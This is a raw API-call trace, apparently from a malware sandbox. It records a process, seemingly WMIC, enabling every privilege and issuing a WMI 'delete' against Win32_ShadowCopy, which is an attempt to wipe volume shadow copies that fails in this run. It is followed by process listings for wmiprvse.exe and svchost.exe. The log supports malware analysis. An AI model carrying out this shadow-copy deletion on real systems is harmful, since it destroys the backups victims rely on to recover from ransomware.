[0074.483] lstrlenW (lpString="from") returned 4 [0074.483] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0074.483] malloc (_Size=0xc) returned 0x24220c0 [0074.483] free (_Block=0x2422078) [0074.483] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160dd5 | out: _String=0x0, _Context=0x1e160dd5) returned="Win32_ShadowCopy" [0074.483] malloc (_Size=0xc) returned 0x2422078 [0074.483] free (_Block=0x24220c0) [0074.483] free (_Block=0x14ff58) [0074.483] free (_Block=0x2422078) [0074.483] lstrlenW (lpString="SET") returned 3 [0074.483] lstrlenW (lpString="delete") returned 6 [0074.483] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0074.483] lstrlenW (lpString="CREATE") returned 6 [0074.483] lstrlenW (lpString="delete") returned 6 [0074.483] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0074.483] free (_Block=0x142f08) [0074.483] malloc (_Size=0x4) returned 0x142f08 [0074.484] lstrlenW (lpString="GET") returned 3 [0074.484] lstrlenW (lpString="delete") returned 6 [0074.484] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0074.484] lstrlenW (lpString="LIST") returned 4 [0074.484] lstrlenW (lpString="delete") returned 6 [0074.484] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0074.484] lstrlenW (lpString="ASSOC") returned 5 [0074.484] lstrlenW (lpString="delete") returned 6 [0074.484] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0074.484] WbemLocator:IUnknown:AddRef (This=0xa60828) returned 0x3 [0074.484] free (_Block=0x142820) [0074.484] lstrlenW (lpString="") returned 0 [0074.484] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.484] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0074.484] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.484] malloc (_Size=0x14) returned 0x14ebe8 [0074.484] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.484] GetCurrentThreadId () returned 0x8b0 [0074.484] GetCurrentProcess () returned 0xffffffff [0074.484] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x26fac4 | out: TokenHandle=0x26fac4*=0x264) returned 1 [0074.484] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26fac0 | out: TokenInformation=0x0, ReturnLength=0x26fac0) returned 0 [0074.484] malloc (_Size=0x118) returned 0x2422448 [0074.484] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x3, TokenInformation=0x2422448, TokenInformationLength=0x118, ReturnLength=0x26fac0 | out: TokenInformation=0x2422448, ReturnLength=0x26fac0) returned 1 [0074.484] AdjustTokenPrivileges (in: TokenHandle=0x264, DisableAllPrivileges=0, NewState=0x2422448*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0074.484] free (_Block=0x2422448) [0074.484] CloseHandle (hObject=0x264) returned 1 [0074.484] lstrlenW (lpString="GET") returned 3 [0074.484] lstrlenW (lpString="delete") returned 6 [0074.484] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0074.484] lstrlenW (lpString="LIST") returned 4 [0074.484] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0074.485] lstrlenW (lpString="SET") returned 3 [0074.485] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0074.485] lstrlenW (lpString="CALL") returned 4 [0074.485] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0074.485] lstrlenW (lpString="ASSOC") returned 5 [0074.485] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0074.485] lstrlenW (lpString="CREATE") returned 6 [0074.485] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0074.485] lstrlenW (lpString="DELETE") returned 6 [0074.485] lstrlenW (lpString="delete") returned 6 [0074.485] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0074.568] malloc (_Size=0xc) returned 0x2422078 [0074.568] lstrlenA (lpString="") returned 0 [0074.568] malloc (_Size=0x2) returned 0x142820 [0074.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe026a2, cbMultiByte=-1, lpWideCharStr=0x142820, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0074.568] free (_Block=0x142820) [0074.568] malloc (_Size=0xc) returned 0x24220c0 [0074.568] lstrlenA (lpString="") returned 0 [0074.568] malloc (_Size=0x2) returned 0x142820 [0074.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe026a2, cbMultiByte=-1, lpWideCharStr=0x142820, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0074.568] free (_Block=0x142820) [0074.568] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.568] malloc (_Size=0x3e) returned 0x14ff58 [0074.568] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0074.568] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0x1e160d31 | out: _String="Select", _Context=0x1e160d31) returned="Select" [0074.568] malloc (_Size=0xc) returned 0x2422168 [0074.568] free (_Block=0x24220c0) [0074.568] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160d31 | out: _String=0x0, _Context=0x1e160d31) returned="*" [0074.568] lstrlenW (lpString="FROM") returned 4 [0074.568] lstrlenW (lpString="*") returned 1 [0074.568] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0074.568] malloc (_Size=0xc) returned 0x24220c0 [0074.569] free (_Block=0x2422168) [0074.569] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160d31 | out: _String=0x0, _Context=0x1e160d31) returned="from" [0074.569] lstrlenW (lpString="FROM") returned 4 [0074.569] lstrlenW (lpString="from") returned 4 [0074.569] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0074.569] malloc (_Size=0xc) returned 0x2422168 [0074.569] free (_Block=0x24220c0) [0074.569] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x1e160d31 | out: _String=0x0, _Context=0x1e160d31) returned="Win32_ShadowCopy" [0074.569] malloc (_Size=0xc) returned 0x24220c0 [0074.569] free (_Block=0x2422168) [0074.569] free (_Block=0x14ff58) [0074.569] malloc (_Size=0xc) returned 0x2422168 [0074.569] malloc (_Size=0xc) returned 0x24220a8 [0074.569] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0074.569] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0074.569] free (_Block=0x2422078) [0074.569] free (_Block=0x2422168) [0074.570] ??0CHString@@QAE@XZ () returned 0x26fa40 [0074.570] GetCurrentThreadId () returned 0x8b0 [0074.570] malloc (_Size=0xc) returned 0x2422168 [0074.570] malloc (_Size=0xc) returned 0x2422078 [0074.570] malloc (_Size=0xc) returned 0x2422108 [0074.570] malloc (_Size=0xc) returned 0x2422120 [0074.570] malloc (_Size=0xc) returned 0x2422138 [0074.570] SysStringLen (param_1="\\\\") returned 0x2 [0074.570] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0074.570] malloc (_Size=0xc) returned 0x2422150 [0074.570] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0074.570] SysStringLen (param_1="\\") returned 0x1 [0074.570] malloc (_Size=0xc) returned 0x2422180 [0074.570] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0074.570] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0074.570] free (_Block=0x2422150) [0074.571] free (_Block=0x2422138) [0074.571] free (_Block=0x2422120) [0074.571] free (_Block=0x2422108) [0074.571] free (_Block=0x2422078) [0074.571] free (_Block=0x2422168) [0074.571] malloc (_Size=0xc) returned 0x2422168 [0074.571] malloc (_Size=0xc) returned 0x2422078 [0074.571] malloc (_Size=0xc) returned 0x2422108 [0074.571] WbemLocator:IWbemLocator:ConnectServer (in: This=0xa60828, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xe4c204 | out: ppNamespace=0xe4c204*=0xa6d0bc) returned 0x0 [0074.576] free (_Block=0x2422108) [0074.576] free (_Block=0x2422078) [0074.576] free (_Block=0x2422168) [0074.576] CoSetProxyBlanket (pProxy=0xa6d0bc, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0074.576] free (_Block=0x2422180) [0074.576] ??1CHString@@QAE@XZ () returned 0x74290504 [0074.576] ??0CHString@@QAE@XZ () returned 0x26fa38 [0074.576] GetCurrentThreadId () returned 0x8b0 [0074.576] malloc (_Size=0xc) returned 0x2422180 [0074.576] lstrlenA (lpString="") returned 0 [0074.576] malloc (_Size=0x2) returned 0x142820 [0074.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xe026a2, cbMultiByte=-1, lpWideCharStr=0x142820, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0074.577] free (_Block=0x142820) [0074.577] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0074.577] SysStringLen (param_1="") returned 0x0 [0074.577] free (_Block=0x2422180) [0074.577] malloc (_Size=0xc) returned 0x2422180 [0074.577] IWbemServices:ExecQuery (in: This=0xa6d0bc, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x26fa34 | out: ppEnum=0x26fa34*=0x0) returned 0x80041014 [0075.509] free (_Block=0x2422180) [0075.509] _CxxThrowException () [0075.509] malloc (_Size=0x10) returned 0x2422180 [0075.509] ??1CHString@@QAE@XZ () returned 0x74290504 [0075.509] free (_Block=0x24220c0) [0075.510] free (_Block=0x24220a8) [0075.510] GetCurrentThreadId () returned 0x8b0 [0075.510] ??0CHString@@QAE@PBG@Z () returned 0x26faf8 [0075.510] ??YCHString@@QAEABV0@PBG@Z () returned 0x26faf8 [0075.510] ??0CHString@@QAE@XZ () returned 0x26f9bc [0075.510] malloc (_Size=0xc) returned 0x24220a8 [0075.510] malloc (_Size=0xc) returned 0x24220c0 [0075.510] SysStringLen (param_1="") returned 0x0 [0075.510] free (_Block=0x24220a8) [0075.510] CoCreateInstance (in: rclsid=0xe06cb0*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe06c00*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xe4c21c | out: ppv=0xe4c21c*=0xa60810) returned 0x0 [0075.529] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0xa60810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x26f9d4 | out: MessageText=0x26f9d4*="Initialization failure\r\n") returned 0x0 [0075.534] free (_Block=0x24220c0) [0075.534] malloc (_Size=0xc) returned 0x24220c0 [0075.534] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0xa60810, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x26f9f8 | out: MessageText=0x26f9f8*="WMI") returned 0x0 [0075.535] malloc (_Size=0xc) returned 0x24220a8 [0075.535] lstrlenW (lpString="WMI") returned 3 [0075.535] lstrlenW (lpString="Wbem") returned 4 [0075.535] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0075.535] lstrlenW (lpString="WMI") returned 3 [0075.535] lstrlenW (lpString="WMI") returned 3 [0075.535] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0075.535] WbemStatusCodeText:IUnknown:Release (This=0xa60810) returned 0x0 [0075.535] ??1CHString@@QAE@XZ () returned 0x74290504 [0075.535] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x26f224, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0075.536] FormatMessageW (in: dwFlags=0x2500, lpSource=0x26f224, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f220, nSize=0x0, Arguments=0x26f20c | out: lpBuffer="䓐RERROR:\r\nDescription = %1") returned 0x2e [0075.536] malloc (_Size=0xc) returned 0x2422168 [0075.536] LocalFree (hMem=0x5244d0) returned 0x0 [0075.536] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0075.536] malloc (_Size=0x2f) returned 0x2422448 [0075.536] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x2422448, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0075.536] fprintf (in: _File=0x74eb2940, _Format="%s" | out: _File=0x74eb2940) returned 46 [0075.538] fflush (in: _File=0x74eb2940 | out: _File=0x74eb2940) returned 0 [0075.538] free (_Block=0x2422448) [0075.539] free (_Block=0x2422168) [0075.539] free (_Block=0x24220a8) [0075.539] free (_Block=0x24220c0) [0075.539] ??1CHString@@QAE@XZ () returned 0x1 [0075.539] ??0CHString@@QAE@PBG@Z () returned 0x26fb18 [0075.539] ??YCHString@@QAEABV0@PBG@Z () returned 0x26fb18 [0075.539] GetCurrentThreadId () returned 0x8b0 [0075.539] ??1CHString@@QAE@XZ () returned 0x1 [0075.539] WbemLocator:IUnknown:Release (This=0xa6d0bc) returned 0x0 [0075.541] ?Empty@CHString@@QAEXXZ () returned 0x74290504 [0075.541] free (_Block=0x2422180) [0075.542] _kbhit () returned 0x0 [0075.544] free (_Block=0x142f08) [0075.544] free (_Block=0x2422060) [0075.544] free (_Block=0x14fe88) [0075.544] free (_Block=0x14fe70) [0075.544] free (_Block=0x14fe58) [0075.544] free (_Block=0x143178) [0075.544] free (_Block=0x14eb88) [0075.544] free (_Block=0x14ff20) [0075.544] free (_Block=0x24220d8) [0075.544] free (_Block=0x14feb0) [0075.544] free (_Block=0x24220f0) [0075.544] free (_Block=0x14ebc8) [0075.544] free (_Block=0x1431e8) [0075.544] free (_Block=0x142e90) [0075.544] free (_Block=0x14fef8) [0075.545] ?Empty@CHString@@QAEXXZ () returned 0x74290504 [0075.545] free (_Block=0x1431a8) [0075.545] free (_Block=0x14eba8) [0075.545] free (_Block=0x2422090) [0075.545] free (_Block=0x142720) [0075.545] free (_Block=0x142768) [0075.545] free (_Block=0x1427b0) [0075.545] free (_Block=0x14ebe8) [0075.545] free (_Block=0x142888) [0075.545] free (_Block=0x142e78) [0075.545] free (_Block=0x14e8c8) [0075.545] free (_Block=0x142e60) [0075.545] free (_Block=0x14e8a8) [0075.545] free (_Block=0x142e48) [0075.545] free (_Block=0x14e888) [0075.545] free (_Block=0x1429c0) [0075.545] free (_Block=0x1429d8) [0075.545] free (_Block=0x142988) [0075.545] free (_Block=0x1429a0) [0075.545] free (_Block=0x1429f8) [0075.545] free (_Block=0x142a10) [0075.545] free (_Block=0x142a30) [0075.545] free (_Block=0x14e868) [0075.545] free (_Block=0x142918) [0075.545] free (_Block=0x142930) [0075.546] free (_Block=0x1428e0) [0075.546] free (_Block=0x1428f8) [0075.546] free (_Block=0x142950) [0075.546] free (_Block=0x142968) [0075.546] free (_Block=0x1428a8) [0075.546] free (_Block=0x1428c0) [0075.546] free (_Block=0x142840) [0075.546] free (_Block=0x1427f8) [0075.546] free (_Block=0x24204a0) [0075.546] WbemLocator:IUnknown:Release (This=0xa60828) returned 0x2 [0075.546] WbemLocator:IUnknown:Release (This=0xa6d064) returned 0x0 [0075.546] WbemLocator:IUnknown:Release (This=0xa6d00c) returned 0x0 [0075.547] WbemLocator:IUnknown:Release (This=0xa60828) returned 0x1 [0075.547] ?Empty@CHString@@QAEXXZ () returned 0x74290504 [0075.547] WbemLocator:IUnknown:Release (This=0xa60828) returned 0x0 [0075.547] free (_Block=0x14fdf8) [0075.547] free (_Block=0x14fe10) [0075.547] free (_Block=0x14eb48) [0075.547] free (_Block=0x14fe28) [0075.547] free (_Block=0x14fe40) [0075.547] free (_Block=0x14eb68) [0075.547] free (_Block=0x14fcd8) [0075.547] free (_Block=0x14fcf0) [0075.547] free (_Block=0x14ea88) [0075.547] free (_Block=0x14fd08) [0075.548] free (_Block=0x14fd20) [0075.548] free (_Block=0x14eaa8) [0075.548] free (_Block=0x14fc78) [0075.548] free (_Block=0x14fc90) [0075.548] free (_Block=0x14ea48) [0075.548] free (_Block=0x14fca8) [0075.548] free (_Block=0x14fcc0) [0075.548] free (_Block=0x14ea68) [0075.548] free (_Block=0x14fd98) [0075.548] free (_Block=0x14fdb0) [0075.548] free (_Block=0x14eb08) [0075.548] free (_Block=0x14fdc8) [0075.548] free (_Block=0x14fde0) [0075.548] free (_Block=0x14eb28) [0075.548] free (_Block=0x14fc18) [0075.548] free (_Block=0x14fc30) [0075.548] free (_Block=0x14ea08) [0075.548] free (_Block=0x14fc48) [0075.548] free (_Block=0x14fc60) [0075.548] free (_Block=0x14ea28) [0075.548] free (_Block=0x14fd38) [0075.549] free (_Block=0x14fd50) [0075.549] free (_Block=0x14eac8) [0075.549] free (_Block=0x14fd68) [0075.549] free (_Block=0x14fd80) [0075.549] free (_Block=0x14eae8) [0075.549] free (_Block=0x14fb88) [0075.549] free (_Block=0x14fba0) [0075.549] free (_Block=0x14e9a8) [0075.549] free (_Block=0x143110) [0075.549] free (_Block=0x143128) [0075.549] free (_Block=0x14e908) [0075.549] free (_Block=0x142ed8) [0075.549] free (_Block=0x142ef0) [0075.549] free (_Block=0x14e8e8) [0075.549] free (_Block=0x14faf8) [0075.549] free (_Block=0x14fb10) [0075.549] free (_Block=0x14e948) [0075.549] free (_Block=0x14fbb8) [0075.549] free (_Block=0x14fbd0) [0075.549] free (_Block=0x14e9c8) [0075.549] free (_Block=0x14fac8) [0075.549] free (_Block=0x14fae0) [0075.550] free (_Block=0x14e928) [0075.550] free (_Block=0x14fb28) [0075.550] free (_Block=0x14fb40) [0075.550] free (_Block=0x14e968) [0075.550] free (_Block=0x14fb58) [0075.550] free (_Block=0x14fb70) [0075.550] free (_Block=0x14e988) [0075.550] free (_Block=0x14fbe8) [0075.550] free (_Block=0x14fc00) [0075.550] free (_Block=0x14e9e8) [0075.550] CoUninitialize () [0075.579] exit (_Code=-2147217388) [0075.579] free (_Block=0x143140) [0075.579] free (_Block=0x143ea8) [0075.579] ??1CHString@@QAE@XZ () returned 0x74290504 [0075.579] free (_Block=0x142fb0) [0075.579] free (_Block=0x143fd8) [0075.579] free (_Block=0x143e88) [0075.580] free (_Block=0x143e68) [0075.580] free (_Block=0x143e38) [0075.580] free (_Block=0x143e18) [0075.580] free (_Block=0x143de8) [0075.580] free (_Block=0x143da8) [0075.580] free (_Block=0x143d88) [0075.580] ??1CHString@@QAE@XZ () returned 0x74290504 [0075.580] free (_Block=0x1431d8) Thread: id = 213 os_tid = 0x3c0 Thread: id = 214 os_tid = 0xbc4 Thread: id = 215 os_tid = 0x714 Thread: id = 216 os_tid = 0x688 Thread: id = 217 os_tid = 0x864 Process: id = "72" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65007000" os_pid = "0x818" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "35" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 218 os_tid = 0xafc Thread: id = 219 os_tid = 0x83c Thread: id = 220 os_tid = 0x838 Thread: id = 221 os_tid = 0x834 Thread: id = 222 os_tid = 0x830 Thread: id = 223 os_tid = 0x82c Thread: id = 224 os_tid = 0x820 Thread: id = 225 os_tid = 0x81c Thread: id = 289 os_tid = 0x5e8 Thread: id = 302 os_tid = 0xb34 Process: id = "73" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x1d1f000" os_pid = "0x8a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "35" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00082158" [0xc000000f] Thread: id = 226 os_tid = 0x41c Thread: id = 227 os_tid = 0xbe8 Thread: id = 228 os_tid = 0x994 Thread: id = 229 os_tid = 0x980 Thread: id = 230 os_tid = 0x7c8 Thread: id = 231 os_tid = 0x9b8 Thread: id = 232 os_tid = 0x808 Thread: id = 292 os_tid = 0x790 Thread: id = 301 os_tid = 0x864 Process: id = "74" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 238 os_tid = 0xa94 Thread: id = 239 os_tid = 0x990 Thread: id = 240 os_tid = 0x810 Thread: id = 241 os_tid = 0x754 Thread: id = 242 os_tid = 0x704 Thread: id = 243 os_tid = 0x6b0 Thread: id = 244 os_tid = 0x698 Thread: id = 245 os_tid = 0x678 Thread: id = 246 os_tid = 0x630 Thread: id = 247 os_tid = 0x610 Thread: id = 248 os_tid = 0x14c Thread: id = 249 os_tid = 0x140 Thread: id = 250 os_tid = 0x158 Thread: id = 251 os_tid = 0x294 Thread: id = 252 os_tid = 0x230 Thread: id = 253 os_tid = 0x21c Thread: id = 254 os_tid = 0x1c4 Thread: id = 288 os_tid = 0x8bc Thread: id = 293 os_tid = 0xa04 Thread: id = 294 os_tid = 0x8d0 Thread: id = 295 os_tid = 0xa2c Thread: id = 297 os_tid = 0x7d4 Process: id = "75" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "35" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT 